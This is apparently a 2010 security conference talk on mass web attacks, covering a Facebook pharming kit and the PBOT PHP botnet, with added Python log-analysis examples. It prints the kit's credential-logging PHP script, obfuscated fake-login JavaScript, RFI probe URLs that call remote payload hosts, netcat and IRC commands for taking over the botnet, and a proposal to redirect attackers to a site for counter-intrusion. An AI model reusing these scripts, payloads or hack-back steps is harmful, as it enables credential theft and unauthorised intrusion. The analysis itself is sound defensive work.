© TEHTRI-Security 1 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010


Speaker

• Laurent OUDOT
  – Founder & CEO of TEHTRI-Security (2010)
  – Senior Security Expert
    • When? 15 years of IT Security
    • What? Hardening, pentests...
    • Where? On networks and systems of highly sensitive places: French Nuclear Warhead Program, United Nations, French Ministry of Defense...
  – Research on defensive & offensive technologies
• Past: Member of the team RstAck & of the Steering Committee of the Honeynet Research Alliance...
• Frequent presenter and instructor at computer security and academic conferences like Cansecwest, Pacsec, BlackHat USA-Asia-Europe, HITB Dubai-Amsterdam, US DoD/US DoE, Defcon, Hope, Honeynet, PH-Neutral, Hack.LU
• Contributor to several research papers for SecurityFocus, MISC Magazine, IEEE, etc.

About TEHTRI-Security

• Company created in April 2010
• Cutting-edge technologies
  – Advanced & Technical Consulting
  – Penetration Tests / Audits...
  – Fighting Information Leaks, Counter-Intelligence...
• Worldwide: Conferences, Training, Consulting
  – Canada, Lebanon, United Arab Emirates, Singapore, Netherlands, China, Malaysia, France...
• Around 30 public security advisories (6 months)
• International Press / Media

Introduction

• Goal: Analyze recent web attacks that targeted a huge number of people or servers
  – End-users
  – Web servers
  Find & propose innovative solutions
• Target audience:
  – White hats, people who fight Cybercrime, Business Intelligence & Information Warfare
• Notice:
  – Legal Issues: we remind you to carefully respect the laws in your country before applying some techniques shown in this presentation (striking back, etc).

Plan

1 – About the Attacks
2 – Finding Counter-Measures
3 – Real Life Examples

1. ABOUT THE ATTACKS

Let's have a look at some of those threats

Targeting the internet end-users

• Simple example of action
• Phase 1: Compromise a web server and add an evil payload on it
  – Client-side attack (exploit kit)
    • Goal: compromise workstations
  – Pharming (password/data recorder)
    • Goal: steal sensitive data (credit card, passwd...)
• Phase 2: Invite victims
  – Pwn servers and send emails to tons of end users (future potential victims)
  – Wait for them to connect & get trapped

Targeting random web servers

• Phase 1: Identify a vector of intrusion that could be used against multiple servers during an offensive campaign
  – E.g.: Easy Remote File Include against a widely spread web application
• Phase 2: Compromise servers to launch the massive attack from there
  – E.g.: Target random servers or use Search Engines to find targets
• Phase 3: Wait for servers to be compromised and abuse them
  – E.g.: Create a Botnet containing web servers, and use them to start evil activities (DDOS...)

Hiding such evil activities

• Automatic & standalone tools and methods that attack & spread themselves directly
  – Kind of evil cyber life that works alone to compromise servers, etc
• Multiple bounces
  – They have access to many compromised servers, which allows them to bounce and then sometimes hide their addresses, etc
• Timeline
  – "Quick Wins"
  – Short period of attacks but multiple attacks

2. FINDING COUNTER-MEASURES

Finding Counter-Measures

• To protect against such massive web attacks, we need to improve some fields
• Detection
  – Improving web based intrusion detection
• Protection/Containment
  – Improving hardening of web servers
• Active Response
  – Identify the attackers,
  – Identify the human targeted,
  – Counter-attack...
• Internet contains millions of web sites that can be compromised easily
  – Such massive web attacks will still exist for a while

LIVE REVIEW OF EVIL SOURCE CODE

Let's have a look at some sources stolen from some web attackers

3. REAL LIFE EXAMPLES

And now let's have a look at two major threats:
3.1 will focus on pharming against social networks
3.2 will focus on a botnet with web sites included as zombies

3.1 PHARMING ATTACK AGAINST FACEBOOK

Here is an example of how to handle an unknown pharming attempt. The example will focus on a real attack that happened in 2009, against Facebook.

Pharming against Facebook

• Phishing attack with tons of emails sent asking to log in to Facebook
• Fake Facebook portal recording emails and passwords

FAKE FACEBOOK LOGIN PAGE (SOURCE)

Fake Facebook Page: HTML sent

• Here is the fake Facebook login page that was hosted on some compromised web servers
• This HTML (javascript) code was sent to the incoming clients, thinking they were on Facebook (the percent-encoded string handed to unescape() is simply the page's XHTML, starting with the standard XHTML 1.0 Strict doctype)

<script>
<!--
document.write(unescape("%3C%21DOCTYPE%20html%20PUBLIC%20%22-//W3C//DTD%20XHTML%201.0%20Strict//EN%22%0D%0A%20%20%20%22http%3A//www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd%22%3E%0D%0A%3Chtml%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%20xml%3Alang%3D%22en%22%20lang%3D%22en%22%20id
....
%7C%7C%7B%7D%29.checked%20%3D%200%3B%0D%0A%7D%0D%0A%0D%0Afunction%20pop%28url%29%20%7B%0D%0A%20%20window.open%28url%29%3B%0D%0A%7D%0D%0A%3C/script%3E%3C/div%3E%3C/body%3E%0D%0A%3C/html%3E%0D%0A%0D%0A"));
//-->
</script>

This javascript generates HTML

• It contains the fake login FORM
• This FORM sends the HTTP Client to "write.php", which is hosted on the same compromised computer

<form method="GET" action="write.php" id="https://login.facebook.com/login.php?login_attempt=1">

• When a victim tries to log in, here is the GET request sent to "write.php"

http://compromizedhost.tld/fake-facebook/write.php?charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&fb_dtsg=&version=1.0&return_session=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&[email protected]&pass=oldsecret

Behavior of "write.php"

• Once someone sends his login/password, he is redirected to another web page, which is the real Facebook page
• The end user will then have to log in (again?) on the real Facebook page
  – This is not really stealthy, but many end users just thought there was a temporary error
• HTTP packet sent by "write.php"

HTTP/1.1 302 Found
Date: Tue, 28 April 2009 07:13:12 GMT
Server: Apache/2.0 (Unix) PHP/4.3
X-Powered-By: PHP/4.3
Location: http://www.facebook.com/login.php
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

Was it stealthy on Facebook's side?

• The fake Facebook webpage contained references to resources (images, javascript...) hosted on Facebook infrastructure, like:
  – http://static.ak.fbcdn.net/favicon.ico?8:132011
  – http://b.static.ak.fbcdn.net/rsrc.php/zEDCY/lpkg/hm02tea0/en_US/141/160771/js/40m30takmjqccw4c.pkg.js
  – ...
• Thanks to the REFERER sent by (most) Web clients, it was possible to get the URL of the pharming kit against FB
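The Referer-based detection described above, as an added example that is not part of the talk: it scans CDN access-log lines for the resources the fake page kept loading from Facebook and tallies every off-site Referer URL by distinct client IP, which is how the pharming kit's URL surfaces. The allowlist of trusted domains, the IPs and the log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Domains that legitimately embed these resources (assumed allowlist; the talk only names the fbcdn URLs).
TRUSTED_DOMAINS = ("facebook.com", "fbcdn.net")
# Resource paths from the slide that the fake page kept loading from Facebook's CDN.
WATCHED_PATHS = ("/favicon.ico", "/rsrc.php/")

# Apache combined log: the two quoted fields after status and size are the Referer and the User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def is_trusted_host(host: str) -> bool:
    """Exact or dot-bounded suffix match, so 'facebook.com.evil.tld' is not mistaken for facebook.com."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)

def offsite_referers(log_lines):
    """Map each off-site Referer URL that pulled a watched resource to its number of distinct client IPs.
    Every status counts: a 304 still proves the client rendered a page hosted elsewhere."""
    seen = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        if not any(path.startswith(w) for w in WATCHED_PATHS):
            continue
        host = urlsplit(m["referer"]).hostname or ""   # "-" (no Referer sent) yields no hostname
        if not host or is_trusted_host(host):
            continue
        seen.setdefault(m["referer"], set()).add(m["ip"])
    return {url: len(ips) for url, ips in seen.items()}

# Constructed CDN log lines (placeholder IPs): three requests from two victims on the pharming page,
# two legitimate requests, and one Referer crafted to look like Facebook.
SAMPLE_LOG = """\
198.51.100.10 - - [28/Apr/2009:07:13:10 +0000] "GET /favicon.ico?8:132011 HTTP/1.1" 200 1150 "http://compromizedhost.tld/fake-facebook/index.htm" "Mozilla/5.0"
198.51.100.11 - - [28/Apr/2009:07:13:11 +0000] "GET /rsrc.php/zEDCY/lpkg/hm02tea0/en_US/141/160771/js/40m30takmjqccw4c.pkg.js HTTP/1.1" 200 9000 "http://compromizedhost.tld/fake-facebook/index.htm" "Mozilla/5.0"
198.51.100.10 - - [28/Apr/2009:07:13:12 +0000] "GET /rsrc.php/zEDCY/lpkg/hm02tea0/en_US/141/160771/js/40m30takmjqccw4c.pkg.js HTTP/1.1" 304 - "http://compromizedhost.tld/fake-facebook/index.htm" "Mozilla/5.0"
203.0.113.5 - - [28/Apr/2009:07:13:13 +0000] "GET /favicon.ico?8:132011 HTTP/1.1" 200 1150 "http://www.facebook.com/login.php" "Mozilla/5.0"
203.0.113.6 - - [28/Apr/2009:07:13:14 +0000] "GET /favicon.ico?8:132011 HTTP/1.1" 200 1150 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Apr/2009:07:13:15 +0000] "GET /favicon.ico?8:132011 HTTP/1.1" 200 1150 "http://facebook.com.evil.tld/login.php" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for url, victims in offsite_referers(SAMPLE_LOG.splitlines()).items():
        print(f"{victims} client(s) loaded Facebook resources from {url}")
```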

What was possible then?

• Contact the webmasters / admins of the compromised sites used to host the evil Facebook phishing script
• And ask them to send the files involved for further analysis
  – 3 files found
    • index.htm: Fake Login Web Page
    • write.php: Password recorder + 302 redirector
    • passes.txt: ALL THE STOLEN PASSWORDS

Analyzing "write.php"

• PHP Script that records any GET arguments (cleartext output)

<?php
header("Location: http://www.facebook.com/login.php");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
{
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit();
?>

So, what did "passes.txt" contain?

• It contained the email / passwords of any end users who thought it was a real email from Facebook...
• Example

...
charset_test=€,´,€,´,水,Д,Є
fb_dtsg=
version=1.0
return_session=0
[email protected]
pass=oldsecret
...

What could be done then?

• Containment
  – Any email address compromised could be "blocked", and the end-user could be contacted, by asking for a new password to be set
• Track the attackers
  – The webmasters / admins of the compromised web server that hosted the pharming script could help with the logs of the site
  – Good questions:
    • Who asked for "passes.txt"? IP address of attackers
    • When? Look at the different dates
    • How many Facebook end-users were compromised...?
  – Size of bytes sent?
    • A.B.C.D - - [28/Apr/2009:17:07:47 +0200] "GET /..../passes.txt HTTP/1.1" 200 194 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
    • Here we have to look at the users included in the first 194 bytes
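The "first 194 bytes" question above, worked as an added example that is not from the talk: it rebuilds passes.txt exactly the way write.php appends it (CRLF per argument, blank line per victim), reads the bytes-served field of each passes.txt download in the access log, and reports which records, and which fields of each, that download actually revealed. The victims, the attacker IP and the field name "email" (masked on the slide) are constructed assumptions.

```python
import re
from typing import Dict, List, Tuple

# Apache combined log: the field after the status code (%b) is the number of body bytes served.
FETCH_RE = re.compile(r'^(?P<ip>\S+) .*?\[(?P<time>[^\]]+)\] "GET (?P<path>\S+) [^"]*" 200 (?P<size>\d+)')

def render_record(fields: Dict[str, str]) -> bytes:
    """Reproduce write.php's output: one 'name=value' CRLF line per GET argument, then a blank line."""
    body = b"".join(k.encode("utf-8") + b"=" + v.encode("utf-8") + b"\r\n" for k, v in fields.items())
    return body + b"\r\n"

def disclosed_fields(passes: bytes, nbytes: int) -> List[Tuple[int, List[str]]]:
    """For a download that returned the first `nbytes` bytes of passes.txt, list per victim record the
    argument names whose complete line was inside the response; a line cut by the limit is not counted."""
    result, offset = [], 0
    for idx, block in enumerate(passes.split(b"\r\n\r\n")):
        if not block or offset >= nbytes:
            break
        names = []
        for line in block.split(b"\r\n"):
            end = offset + len(line) + 2            # +2 for the CRLF write.php appends to each line
            if end <= nbytes:
                names.append(line.split(b"=", 1)[0].decode("utf-8"))
            offset = end
        offset += 2                                 # the blank separator line after each record
        if names:
            result.append((idx, names))
    return result

def passes_fetches(log_lines: List[str]) -> List[Tuple[str, str, int]]:
    """(client ip, timestamp, bytes served) for every successful GET of passes.txt."""
    hits = []
    for line in log_lines:
        m = FETCH_RE.match(line)
        if m and m["path"].endswith("/passes.txt"):
            hits.append((m["ip"], m["time"], int(m["size"])))
    return hits

def exposure_report(log_lines: List[str], passes: bytes):
    """Per attacker download: which records, and which fields of each, were actually revealed."""
    return [(ip, when, disclosed_fields(passes, size)) for ip, when, size in passes_fetches(log_lines)]

# Constructed victims laid out like the slide's example (emails are made up; "email" is the assumed
# name of the masked field). charset_test is non-ASCII, so everything is counted in UTF-8 bytes.
VICTIMS = [
    {"charset_test": "€,´,€,´,水,Д,Є", "fb_dtsg": "", "version": "1.0", "return_session": "0",
     "email": "victim1@example.com", "pass": "oldsecret"},
    {"charset_test": "€,´,€,´,水,Д,Є", "fb_dtsg": "", "version": "1.0", "return_session": "0",
     "email": "victim2@example.com", "pass": "hunter22"},
]
PASSES_TXT = b"".join(render_record(v) for v in VICTIMS)
# Constructed log entry mirroring the slide's: 194 bytes of passes.txt went to the attacker's IP.
ACCESS_LOG = ['203.0.113.7 - - [28/Apr/2009:17:07:47 +0200] "GET /fake-facebook/passes.txt HTTP/1.1" '
              '200 194 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"']

if __name__ == "__main__":
    for ip, when, records in exposure_report(ACCESS_LOG, PASSES_TXT):
        print(ip, when, records)
```

With these two records the 194-byte download contains the whole first victim but only the charset_test, fb_dtsg and version lines of the second, so the second email and password were not yet disclosed by that fetch.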

Innovative solution?

• Tiny-Offensive solution for FB if they don't have the help of the compromised hoster
  – For each resource (pictures) asked by clients coming from the compromised host (see REFERER), just send big fake pictures in RED with a Security Notice
• Semi-Offensive solution that could be tried by Facebook (Trap!)
  – "Handle" the accounts compromised on FB
  – Add fake accounts on FB
  – Log anything related to those accounts on FB
  – Add those accounts in "passes.txt"
  – Wait for the attackers to read that file
  – Each time they connect on the fake accounts, it's more time to gather more info about them (law enforcement possibilities, etc)

More innovative solution?

• Example of an offensive solution that could be tried by FB:
  – Change "passes.txt" so that the attackers are sent to another page for counter-attack plans (intrusion on attackers' computer or identify them)

$ rm passes.txt; cat > passes.txt.php
<?php header("Location: http://malicious-site/anti-attackers/"); ?>

  – Samples for such a session from an attacker

GET /malware/fb/passes.txt HTTP/1.1
Host: compromised-hosting-server
User-Agent: Mozilla/5.0 (X11; U; Linux; en-US) Firefox/3.6
Accept: text/html,application/xhtml+xml,application/xml

HTTP/1.1 302 Found
Server: Apache/2.2.14 (Unix) OpenSSL/0.9.8l DAV/2 PHP/5.3.1
Location: http://malicious-site/anti-attackers/

3.2 WEB BASED BOTNET

Here is an example of a technique that creates a botnet full of web servers...

Adding Web Sites into a Botnet

[Diagram; labels only: MASSIVE ATTACKS, Web sites, COMMAND & CONTROL CHANNEL, MASSIVE ORDERS, FINAL ACTION (e.g.: DDOS)]

PBOT: The PHP Botnet

• RFI Attackers
  – Automatic Web Scan against PHP
• If a PHP site is vulnerable to an RFI, the web server is turned into a zombie with PBOT
• IRC Command & Control
  – Login / Password
  – Many actions proposed

Hunting PBOT, PHP BotNet

• Phase 1: Identify a PBOT Attack
  – Analyze your logs (web server)
  – Find RFI (Remote File Include) tests and check if it's a PBOT
    http://www.yoursite.tld/yourscript.php?yourargument1=http://ownedbox.tld/evilrepository/payload.txt?
• Phase 2: Analyze source code and retrieve sensitive information
  – IRC Server, Port, Password, Channel...
  – Version of PBOT, Protocol used (e.g. over IRCII PRIVMSG), Internal Password...
• Phase 3: Counter-Attack
  – Infiltrate the Botnet
  – Identify the compromised computers (to alert the CERTs, Administrators, host owners, etc)
  – Kill Pbot
• Sample from the source code

class pBot
{
    var $config = array(
        "server"=>"a.b.c.d",
        "port"=>6669,
        "pass"=>"",               // server password
        "prefix"=>"owned|",
        "maxrand"=>8,
        "chan"=>"#pbotchannel",
        "key"=>"oxi",             // channel password
        "modes"=>"+p",
        "password"=>"l33tP4sS",   // bot password
        "trigger"=>".",
        "hostauth"=>"*"           // * for any hostname
    );
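Phases 1 and 2 above, as an added example that is neither from the talk nor from PBOT itself: flag RFI probes in web-server logs (any query parameter whose value is a remote URL, keeping the trailing "?" of the slide's probe as the PBOT tell) and pull the IRC C2 parameters out of a captured pBot $config array. The log lines and IPs are constructed; the config excerpt reuses the slide's placeholder values.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed web-server log lines (placeholder IPs): a normal request, an RFI probe shaped like the
# slide's example, and one in the Joomla/Mambo form shown later in the deck.
SAMPLE_LOG = """\
203.0.113.9 - - [10/Oct/2010:09:01:02 +0200] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2010:09:01:05 +0200] "GET /yourscript.php?yourargument1=http://ownedbox.tld/evilrepository/payload.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.834"
198.51.100.4 - - [10/Oct/2010:09:01:06 +0200] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://a.b.c.d/evil?? HTTP/1.1" 200 5120 "-" "libwww-perl/5.834"
"""
REQ_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<url>\S+) [^"]*"')
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def rfi_attempts(log_lines):
    """Phase 1: (client ip, parameter, remote url, ends with '?') for each parameter whose value is a URL."""
    hits = []
    for line in log_lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        # parse_qsl decodes %5b/%5d, so the Joomla-style _REQUEST[...] names come out readable
        for name, value in parse_qsl(urlsplit(m["url"]).query, keep_blank_values=True):
            if value.lower().startswith(REMOTE_SCHEMES):
                hits.append((m["ip"], name, value, value.endswith("?")))
    return hits

# Phase 2: excerpt of a captured pBot $config array with the slide's placeholder values.
PBOT_SOURCE = '''
class pBot
{
    var $config = array(
        "server"=>"a.b.c.d",
        "port"=>6669,
        "pass"=>"",
        "prefix"=>"owned|",
        "chan"=>"#pbotchannel",
        "key"=>"oxi",
        "password"=>"l33tP4sS",
        "trigger"=>"."
    );
'''
CONFIG_RE = re.compile(r'"(?P<key>\w+)"\s*=>\s*(?:"(?P<str>[^"]*)"|(?P<num>\d+))')

def pbot_config(php_source):
    """Pull the C2 parameters out of the array: IRC server/port, channel and its key, bot password."""
    cfg = {m["key"]: m["str"] if m["str"] is not None else int(m["num"]) for m in CONFIG_RE.finditer(php_source)}
    wanted = ("server", "port", "pass", "chan", "key", "password", "trigger")
    return {k: cfg[k] for k in wanted if k in cfg}

if __name__ == "__main__":
    print(rfi_attempts(SAMPLE_LOG.splitlines()))
    print(pbot_config(PBOT_SOURCE))
```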

Infiltrate the Botnet

• How to connect to the remote IRC Server
  – Use the native PHP code from Pbot (which becomes a PHP Client Honeypot) or modify it,
  – Or sometimes use an IRC Client or do it by hand
• Example by hand (safe)
  – Connect
    • nc -nvv a.b.c.d 6669
  – Send your username + nickname
    • USER ownedolsyezun 127.0.0.1 localhost :ownedolsyezun
    • NICK owned|34944893
  – If you get a PING, reply with the PONG
    • PONG :xxxxxxxx
  – Join the channel of the Zombies...
    • JOIN #pbotchannel oxi
  – Become administrator of any zombie of this Botnet
    • PRIVMSG #pbotchannel :.user l33tP4sS

Identify who is infected

• Use their command & control channel
  – PRIVMSG #pbotchannel :.info
    :owned|[email protected] PRIVMSG #pbotchannel :[Vuln!]: http://www.xxxxx/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://a.b.c.d/evil??]
• Nickname, username of the Zombie (Random)
  – :owned|86540828!~ownedjzytf
• IP, Hostname of the zombie
  – x.a.b.c
• PHP Script that is vulnerable to an RFI
  – http://www.xxxxx/index.php
• Query string carrying the RFI
  – _REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://a.b.c.d/evil??
• PBOT Repository that was used for this infection
  – http://a.b.c.d/evil??

Kill the BotNet

• How to ask all the bots on the channel to die?

case "die":                                        // MESSAGE USED ON THE COMMAND & CONTROL CENTER
    $this->send("QUIT :MORRI! comando por $nick"); // OUTPUT SENT ON THE CHANNEL
    fclose($this->conn);                           // CLOSE THE FILE DESCRIPTOR (SOCKET) FOR THIS SESSION
    exit;                                          // AND EXIT

• Broadcast this command to any bot in the channel
  – PRIVMSG #pbotchannel :.die
• Stealth alternative: direct PRIVMSG to any zombie...
• Output retrieved through such a command
  – You see all the different zombies dying...

:owned|[email protected] QUIT :Read error: EOF from client
:owned|[email protected] QUIT :Quit: MORRI! comando por owned|34944893
:owned|[email protected] QUIT :Quit: MORRI! comando por owned|34944893
:owned|[email protected] QUIT :Quit: MORRI! comando por owned|34944893
:owned|[email protected] QUIT :Quit: MORRI! comando por owned|34944893
:owned|[email protected] QUIT :Quit: MORRI! comando por owned|34944893
...

LIVE REVIEW OF EVIL SOURCE CODE

Let's have a look at some sources stolen from some web attackers

CONCLUSION

Conclusion

• Massive web attacks
  – It's simple
  – It's cheap
  – It happens now
  – But the IT Security world doesn't talk much about those threats (not technical enough?)
    • They prefer to focus on threats that happen in laboratories (super futuristic exploits, etc)
• Improve monitoring & take a look at your logs
  – Track down the attackers
  – Steal their tools
  – Share your findings
  – Improve Internet Security
• "Life is short, Play hard"

This is not a game.

Take care. Thanks.

www.tehtri-security.com

Contact TEHTRI-Security
When you catch a web malware...
When you need technical assistance...
Meet TEHTRI-Security
Ask for our trainings...

web (at) tehtri-security (dot) com